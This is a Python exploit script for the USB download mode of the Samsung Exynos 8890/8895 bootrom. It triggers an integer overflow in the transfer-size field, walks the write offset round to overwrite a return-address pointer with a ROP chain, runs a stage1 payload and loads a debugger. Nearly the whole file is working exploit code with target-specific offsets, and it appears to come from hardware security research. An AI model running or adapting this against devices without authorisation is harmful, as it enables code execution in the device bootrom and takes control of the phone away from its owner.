import usb.util
import struct, sys, usb1, libusb1, ctypes, usb, argparse
from keystone import *
from capstone import *
from ghidra_assistant.utils.utils import *
from ghidra_assistant.concrete_device import *

def p32(x):
    return struct.pack("<I", x)

def p8(x):
    return struct.pack("<B", x)

def p16(x):
    return struct.pack("<H", x)

def p64(x):
    return struct.pack("<Q", x)

BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10)

DL_BUFFER_START = 0x02021800
DL_BUFFER_SIZE = 0x4E800 #0x02070000 End

BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb

TARGET_OFFSETS = {
    # XFER_BUFFER,	RA_PTR, XFER_END_SIZE
    "8890": (0x02021800, 0x02020F08, 0x02070000), 
    "8895": (0x02021800, 0x02020F18, 0x02070000)
}

ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2

ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)

class ExynosDevice():

    def __init__(self, idVendor=0x04e8, idProduct=0x1234):
        """Init with vendor/product IDs"""
        self.idVendor = idVendor
        self.idProduct = idProduct
        self.target = "8890"  # TODO auto detect device
        self.connect_device()

    def connect_device(self):
        self.context = usb1.USBContext()
        while True:
            self.handle = self.context.openByVendorIDAndProductID(
                vendor_id=self.idVendor,
                product_id=self.idProduct,
                skip_on_error=True
            )
            if self.handle == None:
                continue
            break

        print("Connected device!")

    def write(self, data):
        transferred = ctypes.c_int()
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
        assert(res == 0), "Could not perform bulk transfer"
        return res

    def send_empty_transfer(self):
        transferred = ctypes.c_int()
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
        assert(res == 0)
        return transferred.value
    
    def test_bug_2(self):
        '''
        Interger overflow in last packet if reamining size is 1.
        '''
        
        transferred = ctypes.c_int()
        bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
        assert res == 0
        
        payload = b"\xaa" * 0x200
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
        assert res == 0
        
        payload = b"\xaa" * 0x200
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
        while True:
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
        pass

    def test_bug(self):
        # Start by sending a valid packet
        # Integer overflow in the size field
        # unk + size + payload + header
        payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)

        assert (len(payload) == BLOCK_SIZE)
        res = self.write(payload, MAX_PAYLOAD_SIZE) 

        for i in range(200):            
            print(hex(self.send_empty_transfer()))
        
        print('Bug probably available')
        sys.exit(0)
        
    def send_normal(self, payload):
        '''
        TODO not working
        '''
        # construct dl_data
        payload = struct.pack("<II", 0, len(payload)) #+ (payload + b"\x00"  * 2)
        transferred = ctypes.c_int()
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
        assert res == 0, "Error sending payload"
        pass

    def exploit(self, payload: bytes):
        '''
        Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload
        '''
        current_offset = TARGET_OFFSETS[self.target][0]
        transferred = ctypes.c_int()
        
        size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6 
        max_payload_size = 0x100000000 - size_to_overflow
        ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
        
        # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
        # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 
        payload = payload + ((max_payload_size - len(payload)) * b"\x00")
        assert len(payload) == max_payload_size, "Invalid payload"
        
        # First send payload to trigger the bug
        bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
        assert res == 0, "Error triggering payload"
        assert transferred.value == len(bug_payload), "Invalid transfered size"
        current_offset += len(bug_payload) - 8  # Remove header
        
        cnt = 0
        while True:
            if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
                break
            self.send_empty_transfer()
            current_offset += CHUNK_SIZE
            cnt += 1
            if current_offset > 0x100000000:
                current_offset = current_offset - 0x100000000 #reset 32 byte integer
            print(f"{cnt} {hex(current_offset)}")
        
        remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
        assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
        if remaining > BLOCK_SIZE:
            self.send_empty_transfer()
            # Send last transfer, TODO who aligns this ROM??
            current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
            cnt += 1
            print(f"{cnt} {hex(current_offset)}")
            
        # Build ROP chain.
        rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
        transferred = ctypes.c_int(0)
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
        assert res == 0, "Error sending ROP chain"
        
    def usb_write(self, data):
        assert len(data) <= 0x200, "Data too big"
        transferred = ctypes.c_int()
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
        assert res == 0, "Error sending data"
        assert transferred.value == len(data), "Invalid transfered size"
        return transferred.value

    def usb_read(self, size):
        transferred = ctypes.c_int()
        buf = ctypes.c_buffer(b"", size)
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 0)
        assert res == 0, "Error receiving data"
        return buf.raw[:transferred.value]

    def run_boot_chain(self):
        stage1 = open("stage1/stage1.bin", "rb").read()
        self.exploit(stage1)
        
        def run_debugger():
            # TODO, hardcoded path
            debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
            debugger += ((0x2000 - len(debugger)) * b"\x00")
            assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
            for block in range(0, len(debugger), 0x200):
                self.usb_write(debugger[block:block+0x200])
            assert self.usb_read(0x200) == b"GiAs", "No response from debugger"
            
            # Test basic functionality
            self.usb_write(b"PING")
            r = self.usb_read(0x200)
            assert r == b"PONG", f"Invalid response from device: {r}"
        
        run_debugger()
        
        

def usb_debug():
    '''
    Function to debug USB behavior
    '''
    
    shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
    assert len(shellcode) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
    
    exynos = ExynosDevice()
    exynos.exploit(shellcode)
    
    transferred = ctypes.c_int()
    # Send some data
    count = 0
    def send_data():
        transferred.value = 0
        p = p32(count) + b"\xaa" * (0x200 - 4)
        res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
        assert res == 0, "Error sending data"
        
    def recv_data():
        transferred.value = 0
        buf = ctypes.c_buffer(b"", 0x200)
        res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)        
        assert res == 0, "Error receiving data"
        hexdump(buf.raw)
        pass
    
    # Should have received some bytes
    while True:
        send_data()
        recv_data()
        count += 1
    pass
    pass

if __name__ == "__main__":
    arg = argparse.ArgumentParser("Exynos exploit")
    arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
    args = arg.parse_args()
    if args.debug:
        usb_debug()
        sys.exit(0)
    exynos = ExynosDevice()
    exynos.run_boot_chain()